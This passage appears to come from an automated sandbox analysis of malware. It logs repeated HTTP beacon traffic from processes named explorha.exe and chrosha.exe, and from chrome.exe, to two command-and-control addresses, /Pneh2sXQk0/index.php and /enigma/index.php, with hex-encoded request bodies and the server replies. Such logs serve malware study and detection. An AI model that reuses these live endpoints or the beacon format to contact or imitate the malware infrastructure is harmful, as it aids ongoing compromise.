                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:40.154689074 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1021192.168.2.550875193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:40.089191914 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:40.337080956 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1022192.168.2.550876193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:40.514228106 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:40.765721083 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1023192.168.2.550877193.233.132.56802956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:40.590543032 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:40.846174955 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1024192.168.2.550878193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:41.022152901 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:41.279551029 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1025192.168.2.550879193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:41.218952894 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:41.466609001 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1026192.168.2.550880193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:41.646644115 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:41.889575958 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1027192.168.2.550881193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:41.723089933 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:41.979163885 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1028192.168.2.550882193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:42.136017084 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:42.382343054 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1029192.168.2.550883193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:42.346355915 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:42.589334011 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1030192.168.2.550884193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:42.740041018 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:42.982563019 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1031192.168.2.550885193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:42.836025000 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:43.082053900 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1032192.168.2.550886193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:43.229115009 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:43.476166010 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1033192.168.2.550887193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:43.450431108 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:43.701328039 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1034192.168.2.550888193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:43.839802980 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.084517956 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1035192.168.2.550889193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:43.948596001 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.195633888 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1036192.168.2.550890193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.340338945 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.598221064 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
